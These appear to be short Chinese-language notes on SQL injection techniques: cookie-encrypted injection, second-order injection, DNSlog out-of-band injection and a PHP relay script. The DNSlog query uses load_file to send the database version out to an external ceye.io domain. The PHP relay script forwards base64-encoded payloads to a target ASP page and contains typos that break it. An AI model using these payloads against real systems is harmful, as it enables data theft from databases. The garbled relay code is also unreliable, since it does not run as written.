cookie&加解密
源代码中加密了一次,所以要先将cookie的值解密,加上注入语句后加密,再来测试注入点
二次注入
一般在源代码中发现漏洞,例如注册界面
#将后面语句注释,使得修改的账户变成dhakkan。
面对输出的长度限制,若是在前端,可以直接在源代码中修改,后端则无办法。
DNSlog
要有文件读取的权限才能进行
DNSlog解决了盲注不能回显,效率低的问题
mysql> select * from users where id=1 and if((select load_file(concat('\\\\', (select version()),'.eii0i8.ceye.io\\abc'))),1,0);Empty set (21.14 sec)
中转注入
<?php
$url='http://xxx/job_bystjb/yjs_byszjs.asp?id=';
$payload=base64_encode($_GET['x']);
echo $payload;
$urls=$ur1.Spayload;
file_get_contents($urls);
echo $urls;
?>
资源
http:/ceye.io/